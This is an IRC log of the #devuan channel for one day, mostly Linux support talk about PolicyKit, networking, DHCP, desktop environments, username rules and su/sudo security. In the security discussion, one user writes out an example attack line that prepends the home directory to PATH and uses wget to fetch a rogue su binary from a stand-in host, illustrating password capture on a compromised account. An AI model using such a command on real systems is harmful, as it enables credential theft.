IRC log for #devuan on 20170709

00:00.14DocScrutinizer05sounds like another freedosktop-gnome-poetterism
00:01.11golinuxI think it started in wheezy
00:01.42fsmithredyeah, in wheezy, but I don't think it was a problem then
00:01.56DocScrutinizer05no idea what it does, but obviously it's between nonsense and utter bullshit
00:02.07golinuxIt was for me in wheezy
00:02.15DocScrutinizer05there's ***su for that
00:02.17fsmithredyou know how the gksu window has a checkbox for how long you want the auth to last?
00:02.27fsmithredthey took that away in pkexec
00:02.35fsmithredso you don't have to choose anymore
00:02.40fsmithredwhat a relief!
00:02.48golinuxsarcasm noted
00:02.48fsmithredbrb, need to check dinner
00:04.13DocScrutinizer05either *-pkexec runs SUID (*ULTRABAD*) or it is actually a execve sudo (nonsense)
00:09.59fsmithredpkexec, like any other PolicyKit application, will use the authentication agent registered for the calling process.
00:10.14DocScrutinizer05waaah policykit
00:11.01DocScrutinizer05thanks for disclosing to me the meaning of pk though :-)
00:11.15DocScrutinizer05I already wondered
00:11.47DocScrutinizer05isn't policykit a fallout/collateral of systemd crap?
00:12.04fsmithredmaybe a precursor. It's been around for awhile.
00:12.07DocScrutinizer05meanwhile maybe
00:12.50DocScrutinizer05all that policy and session and seat management, it gives me nausea
00:13.22fsmithredseems way too complicated
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00:13.54DocScrutinizer0595% complexity for the last 5% of (pointless) featuritis
00:14.22DocScrutinizer05"narrator device in bootmenu"
00:14.44DocScrutinizer05"do you hate blind people?"
00:15.44DocScrutinizer05and my favorite: multiseat PC
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00:19.46*** topic/#devuan is Recent (2017-05-25): Jessie 1.0.0 stable release || This is the Devuan discussion channel (logged at - with useful 'search') | Please take off-topic conversation to #debianfork | /msg chanserv info #devuan | !listkeys #devuan <foo> | Devuan Forum:
00:20.31fsmithredand plug three monitors and keyboards into it?
00:21.13*** join/#devuan guru (~guru@2601:196:8700:c91:3252:cbff:fec5:6f94)
00:22.00DocScrutinizer05specing: I literally know nobody who does that nowadays or just thinks it might have advantages
00:22.14DocScrutinizer05fsmithred: yes, exactly
00:23.01DocScrutinizer05it doesn't scale, it has single point of failure, is terrible mess to administrate, and has no economic advantage either
00:23.20DocScrutinizer05and wastes energy
00:25.13DocScrutinizer05plus you're back to the mid 90s where we shouted through the office "IM BOOTING IN 2 MINUTES!!!"
00:25.16specinghow does buying more weak PCs scale when you need max singlethread oooomph?
00:25.38specingthe admin mess is due 99% to Xorg being a mess
00:26.02specingand I just said what the economic advantage is
00:33.28DocScrutinizer05I can get almost three complete mini-PCs for the price of one gfx card that allows 3 displays, or a mainboard that allows 3 (cheaper) gfx cards
00:34.44*** join/#devuan Oldmoss (~Oldmoss@
00:35.36DocScrutinizer05when you need max oomph, you don't wnat to share that between 3 seats via sup-par displays
00:36.26DocScrutinizer05slightly OT for #devuan since it won't get removed from devuan anyway, I guess
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00:57.00DocScrutinizer05re policykit, or (login|*)kit at large, the name suggests to me I get the pieces in a kit and can try to make something useful out of it myself
01:03.05*** part/#devuan Oldmoss (~Oldmoss@
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02:00.48*** join/#devuan Froboz (
02:04.02FrobozI've been poking at 1.0 for a week or so now.  very nice work!
02:04.56furrywolf(although I didn't do much of it)
02:05.32FrobozI didn't do ANY of it, unfortunately...  on second thought, that's probably "fortunately", because it WORKS.  :D
02:06.19Froboz(I harbor no illusions about my Mad Hacking Skillz.  I'm a good Admin, but that's about it, I think.
02:07.28*** join/#devuan haba_ (499cfa36@gateway/web/freenode/ip.
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05:20.27*** part/#devuan Froboz (
06:08.35*** join/#devuan rdav (
07:01.38*** join/#devuan mushmouth (
07:05.24*** join/#devuan TwistedFate (~twistedfa@unaffiliated/twistedfate)
07:07.31TwistedFateIs it better to have a single sources.list than to have more of them separate?
07:07.43TwistedFateAnd if I install firefox, will it conflict with iceweasel?
07:08.46Leanderit's just a matter of taste, I think
07:09.03Leanderand there's no more iceweasel
07:09.33Leanderit will install firefox-esr
07:09.55Leanderwhich does not conflict with firefox from mozilla's repository, if that's what you're wondering
07:10.04TwistedFatehmm strange
07:10.09TwistedFatei still have option to run iceweasel
07:10.15TwistedFateeven tho it shows like its firefox O.o
07:11.16Leanderit's probably just a symlink or a small script calling firefox
07:12.35TwistedFatenow i see why they opted for esr version, in main firefox there is no sound for alsa users
07:14.55TwistedFatei could never have imagined that mozilla will take a route of a software tyrant
07:15.15LeanderI think that iceweasel was based on firefox ESR for a few years already
07:15.52TwistedFatealso apt-get remove && apt-get purge firefox didnt get rid of my installed plugins and profile..
07:16.26LeanderI don't think purge will ever touch config files in your home folder
07:17.14LeanderI'd expect it to only remove global config files
07:17.42TwistedFatei dont know where it keeps its config O.o
07:18.11Leanderprobably in .mozilla
07:18.33TwistedFatesigh.. i looked 2 times in home for a hidden folders
07:18.39TwistedFateand i didnt see it, now i do :S
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07:52.20aitorgood morning
07:52.49aitoryes, in the hidden .mozilla file
08:16.45*** join/#devuan Irrwahn (
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08:39.57*** join/#devuan Pali (~pali@Maemo/community/contributor/Pali)
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09:15.34*** join/#devuan Besnik_b (
09:29.47metaxso, let's talk about privacy
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10:10.28metax" Hmm... this page doesn't seem to exist. "
10:10.47TheTrueHoohaSecond link, metax
10:10.58TheTrueHoohaDoesn't work with the ~ I accidently added
10:13.32TheTrueHoohadu fug
10:13.52TheTrueHoohaFuggin 6
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11:32.41TwistedFateWhich DE's are installable and work properly in Devuan?
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11:33.27fsmithredxfce, lxde, mate (mostly), and kde can be added after install.
11:34.02fsmithredif you want to go third-party, trinity (kde3 fork) also works
11:34.17TwistedFatefsmithred: so i should not have any issues with kde regarding systemd crap?
11:34.21fsmithredand in ascii, cinnamon will work with some minor edits to configs.
11:34.33fsmithredI don't think so
11:34.40fsmithredhaven't tried it myself
11:36.37fsmithredaptitude -s install kde-plasma-desktop tells me that it would install on my system, and I'm not even allowing libsystemd0 here.
11:39.33fsmithredattempting to install task-kde-desktop gives me errors
11:39.59fsmithredlibpulsedsp : Depends: libpulse0 (= 10.0-1) but 10.0-2 is installed
11:42.03fsmithredoops. Cancel all those results - I forgot that the terminal I'm using is logged into another machine that's running ascii.
11:48.27TwistedFatefsmithred: im on ceres
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11:49.01fsmithredgood, 'cause in jessie, I'm running into problems with vlc-data
11:49.08TwistedFatehmm, there doesnt seem to be trinity in the repos
11:49.16TwistedFateoh, you said third party
11:49.29fsmithredapt wants to install a newer version from jessie-security, but a lot of the kde stuff isn't happy with that
11:50.14fsmithredkde will install in ascii, so it should also install in ceres. Word on the street is "don't lock the screen"
11:52.24*** join/#devuan pav5088_ (~pav5088@
11:54.06fsmithredor if you just want to test-drive trinity on devuan:
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11:55.58TwistedFatehuh, interesting
11:56.08TwistedFatethanks, nice of them to give us trinity :)
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12:31.20specingIs there any recent/good MTA tutorial for devuan? (Also I hate mysql and PHP, but the later is unavoidable)
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13:02.19*** join/#devuan Fervi (
13:02.40Fervineed sysvinit for OpenVZ ... I can't work on this f****** systemd
13:03.00enycFervi: well use it? whats the problem?
13:03.23FerviSysvinit etc doesn't work.
13:03.23FerviAnd with new upgrade, mariadb stop works, because fuck it
13:03.55enycFervi: hum..........   "sysvinit etc doesnt work"  <-- confused
13:04.22FerviOnly systemd works on OpenVZ (or maybe hacks needed, but don't know why)
13:04.42FerviIf I install sysvinit, then system don't boot. It waits for something like "give me a runlevel"
13:04.58Ferviand you can type something, but only S works (then ask for superuser password)
13:05.17FerviSystemd give me this on mariadb
13:05.18Fervilip 09 15:03:58 pingwinek systemd[438]: mariadb.service: Failed at step KEYRING spawning /usr/bin/install: Permission denied
13:05.18FerviWhat dafuq it mean, dunno
13:05.29FerviWhy systemd can't use install - i don't know
13:05.36Fervii even give 777 chmod for /usr/bin/install
13:07.44FerviI'm trying to start mysql without systemd
13:09.01FerviOpenVZ is container ofc
13:09.02Fervifor VPS
13:11.09Ferviok. My site works, but please do something to run normal inits on OpenVZ
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13:19.30aitorparazyd: are you there?
13:21.23aitorlinux-heads has built succesfully :)
13:21.29aitoruploading it:
13:21.51aitorthe issue is in the config file
13:22.21aitorshortly i'll build the installers
13:25.47aitori added the grsecurity and the PaX variables to the config file, but it might need a review
13:27.14aitorpianno pianno
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15:58.28furrywolfspots catprints, then looks around for the cat that left them
16:03.05catprintscat lurking
16:03.22fsmithredI keep reading it as Cat Prince
16:03.39Obi_Code_konobiObi_Code_konobi, readies the light saber
16:04.30Obi_Code_konobiObi_Code_konobi, strikes towards catprints and decapitates him
16:04.39Obi_Code_konobijob done
16:04.47furrywolffinds and pets the cat
16:05.51catprintsliking Cat Prince
16:07.09fsmithredbetter check to see what your cats think before any name changes
16:07.36catprintsmy nick tells what they think.
16:07.47fsmithreddid I mention how much I hate uefi?
16:08.32catprintssounds familiar.
16:10.01furrywolfyes, I believe you have.  :)
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16:52.37gmcastili have a weird problem with my network randomly kicking one of my machines off - under windows, i just have to restart the network and it fixes it.  But on linux i have to eboot, because i cant figure out how to restart the network service
16:52.58fsmithredservice networking restart
16:53.48gmcastilyeah, ive done that and it doesnt look like anything happens
16:54.14gmcastilit gives me a warning and says that running restart is depracated and may not reenable some interfaces
16:54.17fsmithredis wicd installed? you can reconnect with that
16:54.35fsmithredyeah, it's been saying that since squeeze or lenny.
16:54.55fsmithreddid you edit /etc/network/interfaces?
16:55.28gmcastili did at one point - not sure what should be in there now
16:55.36gmcastilis that something i shouldnt edit?
16:55.47fsmithredwell, how are you connecting to the network?
16:55.59gmcastilwired, dhcp
16:56.34fsmithredwhat causes it to connect?
16:56.56fsmithrednetwork-manager, wicd, connman, ceni, dhclient?
16:57.12gmcastilat startup its dhclient i believe - or whatever devuan does out of hte box
16:57.26fsmithreddid you do the default xfce desktop install?
16:57.39gmcastilwicd is installed and the daemon is running
16:57.40fsmithredgo into the apps menu, under network
16:57.47fsmithredopen wicd
16:57.57fsmithredmake sure it shows the wired interface
16:58.11fsmithredclick on the connect button
16:59.25gmcastilits trying to obtain an IP address now.... is it just running dhclient underneath?
16:59.34furrywolfsomething here doesn't make sense.  what is "restart the network"?  wired networks don't have a connected state, and all the default wireless ones automatically reconnect.
16:59.41fsmithrednot sure
17:00.08gmcastilso wicd didnt work - it just says not connected
17:00.19gmcastilfwiw, i have no wireless connections
17:00.27fsmithredyeah, that shouldn't matter
17:00.41gmcastiland i've eliminated hardware issues by replacing the router, cable, and multiple ethernet cards
17:01.09fsmithredlook in /etc/network/interfaces to see if there's an entry for eth0
17:01.25gmcastilyeah, it just says auto eth1
17:02.26fsmithredthat's all?
17:02.34fsmithrednot a line with dhcp or static?
17:02.38fsmithredand is eth1 correct?
17:02.47gmcastilyeah, thts the device i'm connected to
17:03.02gmcastili had thought there should have beenan entry about dhclient
17:03.07fsmithredif it's just that line, you should remove or comment it out
17:03.33gmcastiljust get rid of it and leave the lo and inet loopback lines?
17:03.42fsmithredgo back to wicd, open the preferences (triangle/arrow upper-right)
17:03.54fsmithredmake sure eth1 is set as the default wired device
17:04.26gmcastilit is
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17:04.47fsmithredroot terminal: dhclient eth1
17:05.11gmcastiland remove the line from the interfaces file?
17:05.14fsmithredyes, leave the lo stanza
17:05.30fsmithredif eth1 only has that one line, it's not right.
17:05.44gmcastilremoved it and running dhclient
17:06.04fsmithredso you went from three lines to two in the interfaces file, right?
17:06.10fsmithrednot four lines to three?
17:06.19gmcastilno, 3 lines to 2
17:06.40gmcastilauto lo \ iface lo inet loopback
17:06.57fsmithreddhclient work?
17:07.00gmcastiland then the error that dhclient gives is 'No DHCPOFFER received.  No working leases in persistent database - sleeping."
17:07.17gmcastilive googled that error a number of times and got nothing that seemed to help
17:07.33fsmithredwire plugged in tight?
17:07.45gmcastilyes, yes, i've eliminated all of the usual hardware problems
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17:07.59gmcastilalso...resetting the router doesnt work.  And i've wiresharked the machine and all i see coming out of it are ARP requests for who has
17:08.49fsmithredreally eth1 and not eth0?
17:09.04fsmithredyou have two nics or you moved the hard drive from another machine?
17:09.09gmcastileyah, i have another device in my machine
17:09.22gmcastila network card and a motherboard based ethernet device
17:09.44gmcastilifconfig shows eth1 and lo....ifconfig -a shows eth0, eth1, and lo
17:09.55gmcastiland we're plugged into eth1
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17:11.18fsmithredcat /etc/resolv.conf
17:11.24gmcastili'm not convinced that the networking restart is actually doing anything
17:11.28fsmithredmake sure it's not pointing to the wrong nameserver
17:11.44fsmithredprobably not, since there's nothing in interfaces
17:11.45gmcastiland nameserver 205.171.3.something else
17:11.53fsmithreddlink router?
17:11.55gmcastilthe thing is that it works
17:12.14gmcastilno, its a craptacular router from centurylink - replaed it a couple weeks ago and same problem
17:12.43gmcastili've been working the source of the problem and have concluded it is a bug in the firmware of the router that randomly decides to drop some connections and then ignore the machine
17:12.49gmcastilthe router thinks its still attached to this box
17:12.52gmcastileven though its not
17:13.06gmcastilprobably because the physical link is still being maintained
17:13.10fsmithredreboot router fixes it?
17:13.18gmcastilrebooting the machine fixes it (for linux)
17:13.28gmcastilon windows, just going to "Troubleshoot my network interface." does it
17:13.39gmcastilso windows is doing something to the network interface that isnt being done on linux
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17:13.58fsmithredifconfig eth1 down
17:14.01gmcastili want to know determine what that is, so that i can duplicate it under linux and not have to reboot everytime
17:14.04fsmithredthen try dhclient again
17:15.28gmcastilsame error again - no working leases in persisten database
17:16.10gmcastilanother datapoint....same problem on multiple distros, even those that use network-manager
17:16.15fsmithredother thing I can think of trying is to configure it in interfaces file and get rid of wicd
17:16.48fsmithredrouter doesn't like your network card?
17:16.53gmcastilmultiple NCI
17:17.10fsmithredhave you tried the onboard nic?
17:17.11gmcastilim logged into the router now and it shows a 1G connection to this machine
17:17.20gmcastilyes, this problem is independent of network interface
17:18.50fsmithredbrb need coffee, this is weird...i unplugged the network cable and switched to the other NIC
17:18.59gmcastiland then dhclient eth0 brought it up
17:19.12fsmithredlol, yeah, weird.
17:19.25gmcastilyou've no idea...i've spent the better part of a year trying to debug this problem
17:19.50gmcastilit does it to every wired machine on my network
17:20.03fsmithrednext time get a better router
17:20.15gmcastili dont know if i can
17:20.24gmcastilits one of those router / modem combos from my ISP
17:20.35fsmithredhave you got a real router around?
17:20.52fsmithredyou can probably set the combo to bridged mode and use your own router
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17:21.22fsmithredI did that with a couple different verizon modem/routers
17:21.22gmcastili dont - but there is no reason to believe it wouldnt drop the wired router connection on a regular basis
17:22.35fsmithredyou'd be asking it to do less work
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17:22.53fsmithrednot doing routing
17:23.18fsmithredmaybe you know someone who has a spare you could use for testing
17:23.52gmcastiloh, you mean disabling the routing portion of the router and just using my own?
17:24.31gmcastilthats not a bad idea - another engineer at work concluded the same as i did that it was likely a bug in the firmware - when centurylink replaced my modem, i thought i'd have it solved, but then saw that the firmware revisions were the same
17:24.33fsmithredis it an actiontek from verizon?
17:25.10gmcastilno, its one of these Zyxel routers
17:25.15fsmithreddon't know it
17:25.31fsmithredif it's not obvious how to set it to bridged mode, call tech support and ask them
17:25.38fsmithredthey should be able to walk you through it
17:26.05fsmithredgive you some secret url to get into the right page of the admin interface
17:26.15gmcastili can figure it out - hadnt thought of offloading routing to a different router
17:27.11fsmithredextra bonus if your router will take free firmware
17:28.18gmcastilyeah...thanks for the suggestion btw
17:28.44gmcastili'll give that a try - but switching eth devices and then running dhclient was a good idea, which i hadnt really tried before (that i can think of)
17:29.11gmcastilits a livable workaround - rebooting to reset the physical interface has been killing my productivity
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18:53.10DocScrutinizer05how's adduser supposed to be configured in Devuan regarding acceptable usernames? man adduser|less -j3 +"/the configurable regular expression" . Is there other stuff that sets (other) policies? What's "common knowledge" about DOs and DONTs regarding usernames when e.g. editing etc/passwd "manually", or when using YP whatever?
18:53.56*** join/#devuan g0zzy (
18:58.55DPAThere is a file /etc/adduser.conf
19:12.56DocScrutinizer05yes, I know. I guess what I actually wanted to ask for is in    man useradd|less -j6 +'/On Debian, the only constraints are.*$'
19:14.22DocScrutinizer05and how such policy gets enforced (or does or doesn't apply to) "external user database such as NIS or LDAP!
19:22.37DPAI don't think it's possible to completely prevent the existence of a user with a bad name. However, it may be possible to prevent the ussage of such a user to some extent using pam.
19:27.34KatolaZDPA: I don't understand what a "bad name" is
19:27.55KatolaZPOSIX allows username to be any combination of alphanumeric characters
19:28.06KatolaZas long as the first character is not a dash
19:29.23KatolaZbut it is specified that you can actually have also usernames starting with a dash
19:29.31KatolaZbut those are not to be considered "portable"
19:30.15DocScrutinizer05sorry for bringing it up here, but for background:   (planned) >>DEBIAN BUG: debian systemd 'user=' denies service to usernames that are perfectly valid according to `man useradd|less -j6 +'/On Debian, the only constraints are.*$' ` -- the 'syntax' check on name values for key "user=" should get removed completely since it doesn't serve any obvious purpose<<  -- related:
19:30.50DPAKatolaZ: A bad username is whatever a sysadmin decides doesn't match his own user name policy
19:31.57DocScrutinizer05DPA: exactly, emphasis on "sysadmin decides"
19:31.58gnarfacemy prediction soon: systemd compromised by automated remote user adds with shell escapes in the names
19:35.51KatolaZDPA: agreed :)
19:36.02KatolaZbut it's the sysadmin who creates usernames, right?
19:36.15DocScrutinizer05yes, *should*
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19:37.20DocScrutinizer05unless NIS/YP etc, where not you but another sysadmin did that
19:40.22DocScrutinizer05getpwnam_r() anyway doesn't know any restrictions afaik
19:41.13DocScrutinizer05so no need to over-sanitize any name parameter provided to that function, right?
19:42.30*** join/#devuan Evilham (~Evilham@
19:43.05DocScrutinizer05basically absolutely same rationale applies to e.g `su` and `sudo`
19:43.11*** join/#devuan cocoadaemon (~foo@2a01:e35:8a99:e90:1202:b5ff:fe91:e4ca)
19:44.29DocScrutinizer05I never heard su would reject "syntactically incorrect" usernames, just because it can
19:45.46*** join/#devuan Oldmoss (
19:45.56DocScrutinizer05I hope we don't need to fork su soon since Poettering "fixed that" -- oh wait I guess he already did, "su is broken" [/quote Poettering].
19:51.13*** join/#devuan crayxmp (
19:56.29bluemarlinwait he said that? what could possibly be broken on su
19:57.47DocScrutinizer05it doesn't switch context
19:57.53DocScrutinizer05or whatever
20:00.14bluemarlini bet there is systemd-sudod in development
20:00.22DocScrutinizer05already there
20:01.43bluemarlinmy god,  you're right
20:05.25DPAI think tools asking for passwords for switching to other users is a bad idea overall. If the user got compromised, su could have been replaced by an alias or a changed PATH in .bashrc
20:06.54*** join/#devuan banshi (~banshi@
20:08.09DPAI also beleave that the user group combination is incufficant for normal non-system users. An additional user group paire would be reqiired to limit access of progroms to directories of the user who started them.
20:09.03DocScrutinizer05the elementary MitM problem you got with every authentication
20:11.32DocScrutinizer05I _think_ e.g. selinux (or was it app-armor) is targeting that
20:12.39DPAright, but it's incredibly complicated. I whish there were a easier solution.
20:14.38dethaThere isn't. su/sudo are all or nothing options, and the more fine-grained you go, the more complexity and maintenance you add.
20:16.27gnarfaceyea i'm pretty sure pottering's primary complaint about su is that he didn't read the manpage so he doesn't know about the "-l" option.  alot of his shit is like this, basically reinvention of something based on an excuse justified by apparent lack of awareness of existing functionality
20:16.54gnarfaceand the fuckers at RedHat pay him a full time salary plus benefits
20:17.17gnarfacewhen i was that age, we got fired for leading the company on a giant incompetence-based boondoggle
20:17.47bluemarlinDPA: so what is the safe way to get root privileges without selinux? Use only login shell on tty?
20:18.34DPAbluemarlin: exactly
20:21.06dethaThat may work on someone's laptop, but on a remote server I like the 'PermitRootLogin no'
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20:22.34dethaMaybe separate ssh keys for user login and sudo, and authentication forwarding could work
20:23.24DocScrutinizer05when you're compromised, you lost no matter what. when it's not `PATH=~:$PATH; wget http://rogue-su -O ~/su` then it's the keylogger in your terminal
20:23.31*** join/#devuan Striktarn (
20:25.24DocScrutinizer05or they stole your private keys instead of installing a keylogger. Or they did both, to get your mantra to unlock your PKs
20:26.11DPAdetha: I would just only allow key based authentication. Or rename root, most login attemps are for root anyway:
20:27.30DocScrutinizer05umm that's s/ //g ?
20:27.32dethaDPA: like the 'toor' account? neh.
20:28.40DPADocScrutinizer05: It's all about reducing attack surface. A compromiced user should not be able to become root, any other user, or further compromise the system.
20:28.55bluemarlinnice live feed - i'd love to setup this as my xscreensaver.
20:29.47DPAdetha: toor is in the list.
20:30.50primalzif they're on your system, can't they just "id 0" to see root account name
20:30.55DocScrutinizer05DPA: well, possibly right. But I'd start at "a user must not get compromised"
20:31.27dethaDPA: to actually keep a system going, root privs are needed at times. Nobody outside 'high-security environments' will deal with the hassle of opening a separate terminal/connection for that
20:33.45DPAConvinience has always been the strongest opponent of security.
20:33.46DocScrutinizer05on that rationale nobody has password auth on any of my systems, except locally on local workstation
20:34.37DocScrutinizer05even more convenient than typing in a password
20:35.40dethaMy problem is more the 'automation' accounts. Those have to either log in as root, or have passwordless full privs.
20:36.14dethaAnd once the automation server is compromised, there goes the rest :/
20:37.22DocScrutinizer05mumbles "LetsEncrypt automated update of update scripts"
20:38.45DocScrutinizer05"the rest" == 2/3 of the internet infra
20:42.06buZzDocScrutinizer05: once that worm activates, it'll be hell :P
20:47.03bluemarlinremembered this security marvel:
20:47.16Evilhamthe default certbot from LE is sooo bloated
20:47.54Evilhambluemarlin: o.ô hadn't seen that...
20:50.03bluemarlinit's terrible indeed, i had a quick look into their github and there is hard-coded google analytics in it... i didn't look further.
20:50.15dethaUsing phones for 2fa is "not the solution". First things to get lost/stolen, and (because some banks here do it) there is a nice cottage industry around hijacking phone numbers
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20:51.11bluemarlinbut what detha says as well - it's flawed by design. Cool website though, gives people nice fake sense of security
20:51.12DocScrutinizer05and Android is THE known secure OS for that, which never gets hijacked
20:52.14aitori've built the installer for ascii, but running it i get something like:
20:52.27aitorcan't find cpu0 node
20:52.49aitorafter that, the screen blinks
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21:05.33aitorneed to reboot
21:15.48Lydia_KHoly crap what is up with vim in ascii?
21:16.04Lydia_KIs this the new default debian config that we inherited?
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21:17.01Lydia_KOh finally, I found the answer: set mouse-=a
21:17.30parazydsame thing happened to me today
21:17.37parazydcouldn't paste or anything haha
21:18.05*** join/#devuan blitzed (
21:18.07Lydia_K"Oh you wanted to have vim be able to interact with anything else? Too bad."
21:18.22Lydia_KGod forbid you want to copy paste between vim and other things.
21:18.40Lydia_KThat went right into my vimrc's
21:19.06Lydia_KIt's not even like I'm a mouse person at all
21:19.16Lydia_KI call it "the tugboat" to make fun of how slow it is
21:20.46parazydi managed to almost completely remove the mouse from my workflow
21:21.04parazydusing it only for scrolling and sometimes clicking on links in firefox (vimfx rocks!)
21:21.05*** join/#devuan aitor (
21:21.06Striktarnhi, why is the "non-free" section added by default to sources.list and is there any way I can check if I have installed anything "non-free"?
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21:21.56aitornow i understand: "cpuburn-udeb" is missing in ascii
21:22.57fsmithredStriktarn, you only get asked if you want non-free and contrib if you do expert install. For regular install, wireless firmware needs to be available for many people.
21:23.07fsmithredand yes, you can check...
21:24.02fsmithreddpkg-query -W --showformat='${Package}\t${Section}\n' |grep -e non-free -e contrib
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21:25.25friendlyexAnyone had luck getting the power stuff to work on a lenovo yoga 2 pro?
21:25.33friendlyexLike, suspend on lid close, etc..
21:28.04Striktarnfsmithred, thank you. It returned these packages "libclucene-contribs1libs". But it is not listed as "non-free" at
21:31.50fsmithredI have that installed automatically because of libreoffice
21:33.38fsmithredStriktarn, it's a false positive because "contrib" is in the name.
21:34.30friendlyexmatlock, thanks!
21:34.36friendlyexstarts a googlin'
21:44.18Striktarnfsmithred, awesome!
21:46.27friendlyexYeah, not finding anything in here...  Looks like there is some systemd related documentation, and the associated dirs...
21:46.37friendlyexBut I'm sure those aren't relevant here?  :D
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22:20.32DocScrutinizer05know your enemy ;-D
22:21.08DocScrutinizer05if I could baer with anything systemd on my system, then that's systemd docs/manpages
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22:48.09XenguyOut out brief candle!
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23:05.57Striktarnwhat's the appropriate way to do TRIM of a intel SSD in devuan? I cant find the "fstrim" program in the repos
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23:06.21aitorWhat does Shakespeare mean when he says, "Out out brief candle ..."?
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23:10.47DocScrutinizer05Striktarn: no idea where's fstrim, but maybe this helps anyway
23:12.06catprintsvery cheerful.:)
23:19.10NewGnuGuyaitor: On a similar note :-P
23:26.12Xenguyaitor: I'm not exactly sure, but I threw it in anyway ;)
23:31.54*** join/#devuan Ryushin (chris@2001:470:4b:38f:527b:9dff:fe9e:37e6)
23:32.59StriktarnDocScrutinizer05, It appears mounting with "discard" option is not recommended and the other method is using "fstrim". I wonder what happened to it, it should be a part of "util-linux" in jessie. And I have "util-linux" installed but cant find "fstrim".

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